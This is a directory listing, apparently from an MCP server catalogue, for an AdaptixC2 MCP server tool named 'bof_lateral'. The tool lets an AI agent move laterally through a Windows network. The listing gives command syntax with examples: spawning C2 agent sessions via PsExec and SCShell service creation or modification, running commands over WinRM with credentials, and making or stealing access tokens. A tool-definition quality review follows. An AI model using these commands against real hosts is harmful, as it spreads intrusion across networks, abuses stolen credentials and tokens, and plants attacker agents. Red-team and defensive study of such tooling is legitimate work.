AdaptixC2 MCP Server

Overview Schema Related Servers Score Discussions

bof_lateral

Perform lateral movement by spawning sessions and executing commands on remote targets via PsExec, WinRM, and token impersonation.

Instructions

LateralMovement: Spawn sessions and execute commands on remote targets.

jump psexec [-b binary_name] [-s share] [-p svc_path] [-n svc_name] [-d svc_desc] Spawn session via PsExec (copy+create service). Example: jump psexec 192.168.0.1 /tmp/agent.exe -n UpdateService

jump scshell [-b binary_name] [-s share] [-p svc_path] [-n svc_name] Spawn session via SCShell (modify existing service). Example: jump scshell 192.168.0.1 /tmp/agent.exe -n defragsvc

invoke winrm [-t timeout_ms] [-b] [-u username] [-p password] Execute command via WinRM. Example: invoke winrm 192.168.0.1 "whoami /all" -u DOMAIN\admin -p P@ss

invoke scshell Execute command via SCShell (fileless). Example: invoke scshell 10.0.2.10 defragsvc "cmd.exe /c \share\agent.exe"

token make Create impersonated token (logon types: 2=Interactive, 3=Network, 8=NetworkCleartext, 9=NewCredentials). Example: token make admin P@ssword domain.local 9

token steal Steal access token from a process. Example: token steal 608

runas-user [-l logon_type] [-t timeout_ms] [-o] [-b] Run command as another user (RunasCs-like). Example: runas-user admin P@ss domain.local "cmd /c whoami" -l 9

runas-session Execute binary in another user's session via COM (IHxHelpPaneServer). Requires admin. Example: runas-session 3 C:\Windows\Temp\file.exe

Input Schema

TableJSON Schema

Name	Required	Description	Default
`agent_id`	Yes
`command`	Yes
`args`	No

Output Schema

TableJSON Schema

Name	Required	Description	Default
`result`	Yes

Tool Definition Quality

B3/5.0

Behavior2/5

Does the description disclose side effects, auth requirements, rate limits, or destructive behavior?

No annotations are provided, so the description must disclose behavioral traits. It mentions 'requires admin' for runas-session but lacks details on destructive actions, prerequisites (e.g., admin for psexec), side effects (service creation), or safety profile. This leaves significant gaps for an AI agent.

Agents need to know what a tool does to the world before calling it. Descriptions should go beyond structured annotations to explain consequences.

Conciseness4/5

Is the description appropriately sized, front-loaded, and free of redundancy?

The description is well-structured with subcommands and examples, fitting the tool's complexity. Every sentence adds value, with no wasted content. It is front-loaded with the purpose and then detailed usage.

Shorter descriptions cost fewer tokens and are easier for agents to parse. Every sentence should earn its place.

Completeness3/5

Given the tool's complexity, does the description cover enough for an agent to succeed on first attempt?

Given the tool has an output schema (not shown) and many sibling tools, the description covers subcommands adequately but omits general context like success/failure indications, async behavior, timeouts, and error handling. An agent may need to infer behavior from examples.

Complex tools with many parameters or behaviors need more documentation. Simple tools need less. This dimension scales expectations accordingly.

Parameters2/5

Does the description clarify parameter syntax, constraints, interactions, or defaults beyond what the schema provides?

Schema coverage is 0%, so the description must fully explain parameters. While examples illustrate how 'command' and 'args' are used (e.g., 'jump psexec ...'), it does not define 'agent_id' or clarify that 'command' must be one of the listed subcommands. Partial compensation but insufficient.

Input schemas describe structure but not intent. Descriptions should explain non-obvious parameter relationships and valid value ranges.

Purpose4/5

Does the description clearly state what the tool does and how it differs from similar tools?

Description clearly states 'Spawn sessions and execute commands on remote targets' and enumerates subcommands for lateral movement. While it distinguishes from sibling tools like bof_execution implicitly through content, it does not explicitly differentiate, so a 4 is appropriate.

Agents choose between tools based on descriptions. A clear purpose with a specific verb and resource helps agents select the right tool.

Usage Guidelines3/5

Does the description explain when to use this tool, when not to, or what alternatives exist?

The description provides subcommand syntax and examples, implying when to use each variant (e.g., psexec vs scshell). However, it does not explicitly advise against using this tool for local execution or when alternatives like bof_execution are better, offering only implied guidance.

Agents often have multiple tools that could apply. Explicit usage guidance like "use X instead of Y when Z" prevents misuse.

Install Server

Latest Blog Posts

Lightport: Open-Sourcing Glama's AI Gateway
By punkpeye on April 27, 2026.
open source
OpenAI
Tool Definition Quality Score (TDQS)
By punkpeye on April 3, 2026.
mcp
The Hackers Who Tracked My Sleep Cycle
By punkpeye on March 26, 2026.
security

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/Faceless0x7/AdaptixC2-MCP-Server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server